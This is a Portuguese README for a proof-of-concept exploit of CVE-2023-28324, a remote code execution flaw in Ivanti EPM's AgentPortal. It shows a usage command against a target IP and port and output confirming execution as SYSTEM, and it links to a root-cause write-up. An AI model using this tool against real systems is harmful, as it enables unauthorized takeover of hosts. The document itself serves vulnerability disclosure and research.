
Vulnerabilidade de RCE no AgentPortal do Ivanti EPM
POC para CVE-2023-28324 afetando Ivanti EPM.
Uma análise de causa raiz técnica da vulnerabilidade pode ser encontrada em nosso blog: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
Este POC explora uma vulnerabilidade no AgentPortal.exe para executar comandos arbitrários. Para que este POC funcione, você deve fornecer suas próprias referências ao AgentPortal.exe e APCommon.dll de uma instalação do Ivanti EPM.
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.